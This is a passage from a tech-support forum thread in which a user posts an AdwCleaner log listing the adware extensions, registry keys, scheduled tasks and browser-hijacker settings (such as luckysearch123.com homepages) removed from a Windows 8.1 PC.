    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\palikan.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\nice.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\nice.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\mylucky123.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\searchinme.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\SEARCHPLUGINS\searchinme.xml


    ***** [ DLL ] *****



    ***** [ WMI ] *****



    ***** [ Shortcuts ] *****

    [-] Shortcut disinfected: C:\Users\Public\Desktop\Google Chrome.lnk
    [-] Shortcut disinfected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\f73cfe270e0a8f33\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\c5ecd897b04d4fe6\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\b216584368a76cee\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\513998e1b006ffdf\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4f572ee5bdaa3aca\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\276bc18f565c8259\Google Chrome.lnk


    ***** [ Scheduled Tasks ] *****

    [-] Task deleted: Milimili
    [-] Task deleted: BikaQ_FetchAndUpgrade_CanBeDel


    ***** [ Registry ] *****

    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.001
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.7z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.arj
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bzip2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cab
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cpio
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.deb
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.dmg
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.fat
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gzip
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.hfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.iso
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lha
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzh
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzma
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.ntfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rpm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.squashfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.swm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.taz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tgz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tpz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.txz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.vhd
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.wim
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.zip
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKU\.DEFAULT\Software\ompndb
    [-] Key deleted: HKU\.DEFAULT\Software\jhdbca
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\PRODUCTSETUP
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\ompndb
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\jhdbca
    [#] Key deleted on reboot: HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: HKCU\Software\PRODUCTSETUP
    [-] Key deleted: HKLM\SOFTWARE\Elex-tech
    [-] Key deleted: HKLM\SOFTWARE\hdcode
    [-] Key deleted: HKLM\SOFTWARE\trotuxSoftware
    [-] Key deleted: HKLM\SOFTWARE\ScreenShot
    [-] Key deleted: HKLM\SOFTWARE\WinZiper
    [-] Key deleted: HKLM\SOFTWARE\WinSaberSvc
    [-] Key deleted: HKLM\SOFTWARE\ompndb
    [-] Key deleted: HKLM\SOFTWARE\jhdbca
    [-] Key deleted: HKLM\SOFTWARE\InterHop
    [-] Key deleted: HKLM\SOFTWARE\WinArcher
    [-] Key deleted: HKLM\SOFTWARE\amule-custom
    [-] Key deleted: HKLM\SOFTWARE\mylucky123Software
    [-] Key deleted: HKLM\SOFTWARE\amisitesSoftware
    [-] Key deleted: HKLM\SOFTWARE\startpageing123Software
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A0275D4F-FFAB-4A42-9874-B871B1C4CA3D}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19539992-061C-4E8B-9053-07B175303AF4}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{418DDAC3-E16C-47C2-B5FE-4FBCAB0E10D0}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{56B2B28A-E663-4D28-84A3-3846068A7D63}
    [-] Key deleted: HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [#] Key deleted on reboot: [x64] HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: [x64] HKCU\Software\PRODUCTSETUP
    [-] Key deleted: [x64] HKLM\SOFTWARE\ompndb
    [-] Key deleted: [x64] HKLM\SOFTWARE\jhdbca
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-3023424667-1579791547-2771295078-1001\Products\3CADD814C61E2C745BEFF4CBBAE0010D
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFA0118CE95AE0D70F14E7E8A72452C8
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKCU\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKCU\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [ArcherGroupEx]
    [-] Key deleted: HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinZipper
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubedZLGroupEx]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubZLGroEx]
    [-] Key deleted: HKCU\SOFTWARE\Classes\ChromeHTML
    [-] Key deleted: HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
    [-] Value deleted: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [-] Key deleted: HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [#] Key deleted on reboot: [x64] HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej


    ***** [ Web browsers ] *****

    [-] Firefox fake profile cleaned: Profile1
    [-] Firefox preferences cleaned: "browser.search.defaultenginename" - "nice"
    [-] Firefox preferences cleaned: "browser.search.order.1" - "nice"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.search.selectedEngine" - "nice"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: go search
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: omniboxes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search.delta-homes.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: palikan.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ljibkigjccbegnbeojkoafejpoiachej
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: noajmlkipclmeolfcnflkjhijkigpfjh
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [homepage] Deleted: hxxp://www.palikan.com/?f=1&a=plk_dstndrm_15_51&cd=2XzuyEtN2Y1L1Qzu0A0C0DtC0BzzyE0BtD0F0AtD0FtAtC0EtN0D0Tzu0StCyEyEyCtN1L2XzutAtFtCyDtFtAtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyD0EyBzyyDtCtDtCtGyCyE0FzytG0AyEzzyEtGtB0AzztCtGtDyByCzyyCtA0AtAzz0BtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0AzyzytDyD0CtAtG0Azz0CzztGyEtC0C0AtG0BzzyBtCtGtBtCtAyByE0CtDzy0F0ByE0A2QtN0A0LzuyE&cr=513584365&ir=


    *************************

    :: "Tracing" keys deleted
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C0].txt - [24497 Bytes] - [15/03/2017 14:04:22]
    C:\AdwCleaner\AdwCleaner[S0].txt - [35461 Bytes] - [15/03/2017 13:04:57]
    C:\AdwCleaner\AdwCleaner[S1].txt - [35272 Bytes] - [15/03/2017 13:16:56]
    C:\AdwCleaner\AdwCleaner[S2].txt - [32837 Bytes] - [15/03/2017 14:00:26]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [24793 Bytes] ##########
     
  13. 2017/03/15
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    # AdwCleaner v6.044 - Logfile created 15/03/2017 at 14:04:22
    # Updated on 28/02/2017 by Malwarebytes
    # Database : 2017-03-15.1 [Local]
    # Operating System : Windows 8.1 Single Language (X64)
    # Username : User - ASUS
    # Running from : F:\AdwCleaner.exe
    # Mode: Clean
